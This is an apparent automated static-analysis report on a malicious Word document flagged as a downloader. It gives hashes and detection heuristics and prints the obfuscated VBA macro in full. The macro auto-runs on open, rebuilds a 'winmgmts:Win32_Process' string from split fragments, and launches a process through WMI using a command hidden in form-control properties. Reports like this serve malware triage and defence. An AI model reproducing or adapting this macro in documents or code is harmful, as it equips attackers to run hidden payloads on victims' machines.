Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bfd45e727d643a43…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 202.2 KB
Created: 2019-12-20 06:47:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: e65c9a8500b4d20e3aaef87a1b3d8156
SHA-1: 9dcc1d91bb19d445549803b376a959d407eefc0f
SHA-256: bfd45e727d643a431e46cf616509c5e4a8ff44739520f4969a22c3331f9a4b99
Risk score: 232

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-7469262-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-7469262-0
  • Malformed OLE auto-open stager with embedded ZIP payload (critical, OLE_RAW_MALFORMED_AUTOOPEN_STAGER)
    Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • GetObject call (high, OLE_VBA_GETOBJ)
    Matched line in script: Set Zzbzojqu = GetObject(Boedaxyqtaag)
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Matched line in script: Private Sub Document_open()
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13063 bytes
SHA-256: 4bc68be9c2fca5d56d9f715a70f7fab5a0ed833679ed8c1786794d7a14e97821
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
382 of 621 identifiers look randomly generated (e.g. 'hnkjKHK2222NNKLSess_') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Fwbejxmnpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Vkzimturjeenc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Dim Igsepqmehcbg As Double
Dim Rdtprsexwwvk As Boolean
Ieoffsnrpvso = Jelhfrhtsx
Nlkwjelqvc = (Ahgaoxxcdsnsk)
Nnpmqzueb = 814
Dim Mocxrhqphxkh As String
Achvyrlwyxdg = "Vitae nemo."
Dim Wfcftvljagafc As Double
Dim Hdgkrpxnj As Boolean
Dim Hqpetkrstbu As Boolean
Jjrbbuspqpq = (329)
Dim Wzhystcfnutvm As String
Dim Jbemysahxvm As Double
Zqazkworku = Civpygpe
Dim Pldvevrkc As String
Dim Rfwuukpbw As Boolean
Dim Ulvkeszpx As Double
Sbovorsza = (Wlcyuevz)
Hirsauqzk = ("Voluptas dicta voluptas eveniet velit quia.")
Vlnvfywxjw = (Qpkhgxvtxhz)
Dim Xdnxbaqfubzp As Integer
Fzbtkiuacqm = Otlnmbbh
Hbxnnickfa
   Dim Ypfkuntosohqg As Boolean
Dim Uuwuwqrisaix As Boolean
Smhocapyki = Yaxkzbgit
Vtihhnjlqpf = (Abeudvjo)
Rqlhbgrvqsv = 161
Dim Utilawyttzwk As Integer
Lexpcofqqvfif = "Et aut dolorem."
Dim Oifofkbvkjri As String
Dim Qoxcjgrscsxpd As Boolean
Dim Frrzaerrws As Double
Jnglglszhi = (175)
Dim Sbwfmqqhyiera As Double
Dim Uyxakwwhevhr As String
Dfxlugyhme = Flajplxr
Dim Khvawtrk As String
Dim Mwvdgffbvmmsu As Boolean
Dim Khvgwtmmcvp As Integer
Keqczgpjqxck = (Wlormmjlmveig)
Siqokrqwks = ("Annie")
Gujtvqwpandd = (Yruyraozxp)
Dim Vefpezyscrcb As Boolean
Jkifenkztzbm = Ehwuiausklj
End Sub

Attribute VB_Name = "Camxdyzasov"
Attribute VB_Base = "0{68A08007-2EAE-489F-919A-1C699FE87B53}{A0DE910C-662B-4B56-98C9-1ADFD1F10E64}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Zohvecnk"
Function Aqxdtbyhiyvx()
   Dim Qgrtpykc As Double
Dim Whtrphlwlmia As String
Hjjrvjsswb = Fnlyuonnuoq
Ahnferqqilfo = (Maelslzcx)
Sunbottvwub = 609
Dim Skqzxbfjag As Integer
Qcydvyjbsl = "Soluta voluptatem sed accusantium dolorum est distinctio labore et maxime."
Dim Ptsmtwmk As Integer
Dim Tiuzewfdrnmp As Double
Dim Urbwrdugnnk As Integer
Tpeuprzjqi = (865)
Dim Nwotjqzvbrbv As Boolean
Dim Rxmvhoanlont As Integer
Yhejfcehfndxk = Bnjewzcwv
Dim Tzkafptcx As Integer
Dim Sqnokrzrkds As Boolean
Dim Aepzywkjix As String
Wfhndilmo = (Qipkxdqebraa)
Tdajeksd = ("Placeat voluptatibus natus.")
Mrdgugvvfly = (Mnfrtinveg)
Dim Ekcjlamzax As Boolean
Jjuwfupb = Ovysyvvthlqw
Usapwstupbld = Fwbejxmnpj.Vkzimturjeenc
   Dim Jzerzexnxts As Double
Dim Vwkayxoxqsfp As Double
Sheqirwlow = Rxctseirazn
Uupshycsuegs = (Jyjioskfru)
Bgpjstivowhsh = 135
Dim Vxsvaquzt As Double
Ydlpduvhxvc = "At dolorem asperiores facere."
Dim Njhvmrrbrn As String
Dim Yywjhhwtb As String
Dim Kytmxzajt As Double
Iriymbyph = (207)
Dim Hfvyxqogrjsdw As String
Dim Eucrdvurqfai As Integer
Ummpnroqycjv = Xpnmbtxenqmbn
Dim Twhtlxxgo As Integer
Dim Fnwzhiiyt As Double
Dim Ohaxpzwdleal As Double
Cbayzjzdw = (Injdsotebi)
Ohxkkxbecrue = ("Clay")
Aurslkloh = (Atpghcxchm)
Dim Zogvjhqt As Integer
Lozmjwphaalxk = Yupwczujrs
Cinneipqscq = Usapwstupbld + Camxdyzasov.Ompxvrkfqlvl + Camxdyzasov.Ydootfwvx + Camxdyzasov.Oiuvdbgtedkjs
   Dim Myfyslebmximg As Double
Dim Ntoytxjyf As Double
Ajldeoleezyh = Lttkiirwfw
Vozcaajxk = (Jsubcyhplpp)
Qnwgdeep = 659
Dim Tweczxyayqdjs As Boolean
Oxyghrfgv = "Garrett"
Dim Dcugqazvafx As Boolean
Dim Rmprqahvi As String
Dim Ggjcgnpjrlu As String
Racjwnbrb = (172)
Dim Ucopudsvcfz As Boolean
Dim Xpmpnewxqizq As String
Yuyxfquhezzpn = Uaspkmhbmdwtr
Dim Ozvgtbdhuuxq As String
Dim Pyrdxwigbol As String
Dim Muixdcklathz As Integer
Syvmwvnwefp = (Lhyhucirn)
Unacofkeafpig = ("Reiciendis cumque.")
Vfpqchjtzdc = (Wpyfmxsivl)
Dim Vktcvzrgfgdbx As Double
Ktaymsxikhk = Igathqgxq
Tuimwnybwuiad = Cinneipqscq + Camxdyzasov.Vwczvberfmi + Camxdyzasov.Vzexvfsf.Tag
   Dim Gbdivtxmgctae As String
Dim Viztkmffor As Integer
Jxkjrrkc = Tggrbfwyuoabo
Qzkavprfto = (Scitebwotmslz)
Wcaiihaasab = 870
Dim Bbndljdvmu As Boolean
Snqdgzbm = "Voluptatibus placeat sit recusandae."
Dim Ctfhoscptdpm As String
Dim Zozqftjhehpt As Boolean
Dim Maazkgyuxeukt As Integer
Skfaxesa = (382)
Dim Flvpxrvif As Double
Dim Cqcgtfqvwvzm As Integer
Xksmstaqse = Famzboth
Dim Dudybfnlfyod As String
Dim Cwmjtmxxl As Integer
Dim Qixtlszv As Integer
Yiusvdhyw = (Zexebknd)
Inxlwpruf = ("Mathew")
Xadosryjp = (Bzqdapjilrf)
Dim Vwhynqerasb As Double
Qitpuhgtlyus = Kxcrrynt
Aqxdtbyhiyvx = Huwkeifnxlz + Tuimwnybwuiad + Huwkeifnxlz
   Dim Lqhqdqnnmw As Double
Dim Lrfmazjavdbvd As Double
Jsphjyqtnxo = Pbsjxsyius
Eloholnkae = (Pqyuyrpljaluk)
Kthoziuenblzl = 789
Dim Jkgwuguek As Boolean
Vcezuxwn = "Natus error qui."
Dim Spuoumksnsd As Boolean
Dim Ranoxrpp As String
Dim Wnraohocyy As Double
Vmhaujlxlzl = (375)
Dim Zgizvmavfxb As Boolean
Dim Wlyqfloafb As Integer
Wgeazxcsmpafd = Ouqogxinay
Dim Zkmtfcbzgwvf As Double
Dim Jzgktndazgpnz As Boolean
Dim Secedciavuc As String
Eszknhoj = (Ehqykgescbl)
Taxwbylpqlzv = ("Sherman")
Ezrlempxw = (Xurcaarq)
Dim Jqlnkvznw As Integer
Dzaslpgb = Dkrdeunqkhega
End Function
Function Hbxnnickfa()
   Dim Vxjwlmioireta As Integer
Dim Janznmnszrfw As Integer
Slliqtttpdbuj = Xqtdlcxpspmh
Egpyqqgtlk = (Pkjytdax)
Ltzvvvss = 637
Dim Njlxmvswod As Double
Zkmmfuvigh = "Quod repudiandae impedit cumque rem nesciunt aut dolores earum nihil."
Dim Uwzvvkbs As Double
Dim Nfzmlyldjywb As Boolean
Dim Iiqxwvegcic As Integer
Wbdcmdixgntix = (27)
Dim Xigscknm As Double
Dim Vjmgdqjv As Integer
Cfwkylrbvxo = Bitcjnljojxqt
Dim Cwjnvharmvu As String
Dim Lrwpwklykoah As Boolean
Dim Nvytepayz As Integer
Draqhgpw = (Xniuikssiifec)
Ncpbsmsiostkh = ("Aut.")
Llzhpiqyv = (Grfvzonut)
Dim Uylfetbpalpax As String
Uxnweuwlf = Stewmjem
iwoowjjjjj = "_&&*8992307&)hnkjKHK2222NNKLS"
   Dim Strdkrihhdtsr As Boolean
Dim Pwtjpeip As Boolean
Nnzlumfvefs = Nynuptyznioe
Zkrjednxdiw = (Ownkjlcflck)
Orzfkgkwglmw = 285
Dim Gpueydck As Integer
Xftiknhh = "Dolorem aut quis repellendus soluta eum similique."
Dim Pwyyypcui As Boolean
Dim Oulvpqyl As Integer
Dim Eoyhemclseff As Double
Krwfjaicsa = (42)
Dim Imuxjwapkh As Double
Dim Tcaipfvjoaky As String
Cpkcvxxuepqu = Eqadremgzz
Dim Fzwibwcqtl As String
Dim Lctzylsvk As String
Dim Xzhhqfvpk As Integer
Sxywnurept = (Rpkniohrbsvy)
Pmkyvuscjvbb = ("Consequatur recusandae aut consectetur.")
Dgxklhqsfsmad = (Zczoufetq)
Dim Apfomhrjnvvk As Boolean
Dxhsluqs = Tbndsymgmu
Dlkabmfsqtd = Split("_&&*8992307&)hnkjKHK2222NNKLSwi_&&*8992307&)hnkjKHK2222NNKLSnm_&&*8992307&)hnkjKHK2222NNKLSgmt_&&*8992307&)hnkjKH" + "K2222NNKLSs:W_&&*8992307&)hnkjKHK2222NNKLSin_&&*8992307&)hnkjKHK2222NNKLS32_" + Fwbejxmnpj.Vkzimturjeenc + "_&&*8992307&)hnkjKHK2222NNKLSroc_&&*8992307&)hnkjKHK2222NNKLSess_&&*8992307&)hnkjKHK2222NNKLS", iwoowjjjjj)
   Dim Gnxnoytv As Double
Dim Ptrukfrhugymv As Boolean
Sqaucabt = Jfbfvbrejaezi
Xlamdtrcj = (Sbpvnazyb)
Czegimvysik = 395
Dim Pbgocrdri As Boolean
Qonmezjof = "Adipisci animi et consectetur."
Dim Bhwlfgldzh As Double
Dim Gmulvjxyuk As Double
Dim Tyiusywjyfa As Integer
Rmwgfoaeehzj = (862)
Dim Ehioqlgshxq As Boolean
Dim Kdlamvte As Double
Sowwmori = Kscqrknlz
Dim Punpbtgnoujhg As Double
Dim Upudpoggqsauj As Double
Dim Iesccuigl As Integer
Vwjalwzrpy = (Pkjoxxazxlgme)
Nflijjft = ("Marshall")
Pheusmjrjcstg = (Kvnjpwvvsl)
Dim Phmjqzrh As Boolean
Eezwuvmluzaz = Sjuzulmjgit
Boedaxyqtaag = Join(Dlkabmfsqtd, "")
   Dim Elajbrqm As String
Dim Pcazfkgsn As Boolean
Rzqbuulj = Pcsgiphzygeoy
Chdtnaovbmlji = (Eckjazhtwvyto)
Caucrnhqpwbhq = 553
Dim Gzrbbbeowyvng As String
Gztejkpfpjx = "Sed itaque fugit."
Dim Nzrqzapzcnav As String
Dim Xewzarbpbo As Double
Dim Lqtbrepkbx As Integer
Ogjoemtil = (728)
Dim Btkwutxxdepp As Integer
Dim Avvgokaxq As Boolean
Imlpvdymzshh = Qdaebyqkjerx
Dim Nredzblgmhhar As Double
Dim Msnnlxhaspmex As String
Dim Yyabyioei As Integer
Kqswahnlwl = (Rzgqlnmxnd)
Japerynfhb = ("Error sequi error.")
Iwpfqlhvuoi = (Rdrvjvhkinzr)
Dim Xxxcqnpioygh As String
Kouromzvwjyff = Jpogrjxwmsoci
Set Zzbzojqu = GetObject(Boedaxyqtaag)
   Dim Yqsrrytyuc As Double
Dim Dfxhvtkapbju As Boolean
Sipkvrxtmslvl = Unvqmzke
Uwptxhyevflj = (Eujsfvzhm)
Nneawieopavh = 375
Dim Knrpsrldolr As Boolean
Zevnksyjttdz = "Rerum possimus aut corrupti dolorem minus est sit cumque et."
Dim Uuhjmjdui As Integer
Dim Tfjjztjgqfjt As Integer
Dim Pcgqtnqvkq As Boolean
Begoevnvq = (918)
Dim Zuauthckauy As Boolean
Dim Xdpubyvsa As Double
Ezbaofrucngw = Xohfjmcharbg
Dim Srvzcipufcwv As Boolean
Dim Utqhwadkn As Boolean
Dim Gpwzjyhmwbk As Integer
Ukddifjnj = (Gbujsqieji)
Tvvdpigcjbim = ("Roger")
Abhddxsksieyt = (Gizxrkinctfc)
Dim Fshwvphw As Boolean
Zajcmyqpa = Sjovmsof
Xardksvouy = Boedaxyqtaag + Camxdyzasov.Wgevisjhcgaq.ControlTipText + Camxdyzasov.Vtoybgiqkn.ControlTipText
   Dim Jfpozmrurowod As Integer
Dim Zhbvslyj As Boolean
Kaxaancfpjnc = Ivexpezubkh
Gcmlwqvoltuq = (Johpxonnxgat)
Qzmtjuvccyrm = 378
Dim Wbkhokpftvkdf As String
Gkcvbymhb = "Unde unde et."
Dim Ygliykqnr As Integer
Dim Sfkekfrigpdxw As Boolean
Dim Qvajtiahljt As String
Zmrbjkrwlxogp = (976)
Dim Rvipvjtv As Boolean
Dim Cnrxyuquu As Integer
Xcomvsfxmdeq = Qaepofqetgw
Dim Ndxmvigttudzq As Double
Dim Aeywrhhtmegdd As String
Dim Hpvtruoqi As String
Wxgaqxrsepiz = (Gjkhpfcakmod)
Dlnppxkjnmoim = ("Distinctio.")
Typnblkejtc = (Mtmnauosbtklh)
Dim Ysgsrmrnypvlt As String
Vngoxuzb = Wwrffcupofrn
Txpandxatdsfg = Xardksvouy + Fwbejxmnpj.Vkzimturjeenc
   Dim Fzkqyfsvm As String
Dim Clfqruzvkdjt As String
Osytmwsjpqxjt = Ymxwzvcrw
Uvkavgvrjmtb = (Btwpthbsnlqlx)
Lbcytcxy = 870
Dim Rnbwvfkxaycg As Boolean
Nrbhyjkj = "Quidem fuga vel tempore."
Dim Xlrcgueuhtc As String
Dim Vsgfowqa As Integer
Dim Ylcapaelhgmzj As String
Qfuhyibtr = (249)
Dim Rdvmqosnsre As String
Dim Udiunnwjsxx As Integer
Tgpwrluajapvq = Wvqmmgnvz
Dim Difyfyvuu As Boolean
Dim Wzsznkctzwpqn As Double
Dim Kepglqplh As Integer
Kuqzwevyyqtm = (Sfhjossa)
Qenzggolnsa = ("Itaque in eligendi.")
Zaluoyqq = (Eskhbtscjwcjr)
Dim Rscizzbkcijd As Double
Bixygjgw = Suqqlaqjuz
Set Hbxnnickfa = GetObject(Txpandxatdsfg)
   Dim Flbuofiv As String
Dim Sopirdvezwe As Boolean
Wmuusdfj = Iawqmgldxto
Aydrrzrfwz = (Hulpsqhuy)
Unixntgmm = 437
Dim Twplnjgk As String
Lkflaofc = "Cesar"
Dim Ouqiejbemqn As Double
Dim Hbpzhdxnnvhi As Boolean
Dim Mnfajfwm As String
Ggehcyunn = (123)
Dim Kloyzjcayiacg As Boolean
Dim Hqdtwucitay As Double
Oauukecbqc = Umaxgeyslreju
Dim Hcuxatql As Double
Dim Frbnpqnsxbi As String
Dim Nwaxaxvkap As Integer
Zwejbeaciamx = (Bqqwtvgrhbawp)
Eecztqtj = ("Deserunt sit.")
Xizcmjdtevet = (Fniocjfolzev)
Dim Kfhhhbwngovsw As Double
Sxlahtfhfg = Jwayqzgizox
Hbxnnickfa.XSize = False
   Dim Rksewfwzwlw As Double
Dim Fpowlxcbvsw As Integer
Tfnsrgwip = Wwsyckytcesrz
Ltmwswoplqmet = (Hpisapeez)
Dncbnohsucwt = 298
Dim Hhhhpgfcuwcjg As Boolean
Hpnkysbmjc = "Et aliquam."
Dim Avelwutsiwwje As Integer
Dim Tfzeivin As Double
Dim Ipggvxerje As Boolean
Lgpmtbksegk = (624)
Dim Gkyparhqd As Double
Dim Mlmzsrvjt As Integer
Tpvchdvecfoz = Gcinzziskah
Dim Amkayelrjt As String
Dim Evylzxmxlm As Double
Dim Wuemaeuvss As Boolean
Repudvwildud = (Lcuqzoyyd)
Yqezcrla = ("Inventore ipsum et aut facilis dolores debitis eveniet inventore.")
Uirtqpgbtzac = (Sacsgttblufe)
Dim Iljddnqucw As Boolean
Rwkfzwxkgbott = Twxolwws
Hbxnnickfa.YSize = False
   Dim Buobsroo As Integer
Dim Cillxgelnajto As Double
Hxtpdijupwrqe = Bezpylscjrbxi
Ifbbluvzkrso = (Fpzmqyeuyoo)
Kxbkbounmpdn = 271
Dim Foyfwwndc As String
Rhpogmnwzl = "Jennifer"
Dim Grabbtawyn As Double
Dim Fzisrhgvyzjge As String
Dim Cpqcvdfso As Integer
Mjbgmdpqigdu = (366)
Dim Ehkhhuwboxgi As Integer
Dim Wahuwwvxtsmfq As Double
Yzumjrwukgby = Eaestuhzjyix
Dim Sucdikpxlvb As Boolean
Dim Fxnuxkbo As Double
Dim Mxtjzpwdm As Boolean
Cqeyqafgp = (Nucbveknfza)
Fpaqiospvrd = ("Hic ut error numquam.")
Vhkvicawjz = (Urtzejceotazo)
Dim Qasczvmi As Integer
Jrxltvpt = Xyqriacvcgk
Do While Zzbzojqu.Create(KSNNSN & Aqxdtbyhiyvx, Luibajxbmcnos, Hbxnnickfa, Ztyreebjmttx)
Loop
   Dim Rivjlnqchpl As Integer
Dim Fgmtclejguki As Integer
Zhbzcvoabo = Gbrxodxxyw
Opvfknkapaq = (Qirdeeylq)
Rjghlyoc = 176
Dim Knzjpoegwf As String
Rxufutsrdyjsn = "Aliquam consectetur officia."
Dim Dpqmnctfv As Integer
Dim Oqteuzsvsimg As Double
Dim Kbimdgvphbrf As Boolean
Uysymaecxzdja = (995)
Dim Yqjlrdbkts As Double
Dim Zisnogvbtqnte As Boolean
Djitgdgik = Btsnzgbbftem
Dim Erphdqhc As Integer
Dim Bkyeutzieueci As Integer
Dim Grckoyxtqcmr As Double
Rmzxulohw = (Twhuybiiqw)
Rhyeqichc = ("Sit qui dolorum in voluptas iste.")
Nifeoucz = (Zucpzraeikkt)
Dim Qvhyztziu As Integer
Msxunnxdisnw = Qcdtoruayosn
End Function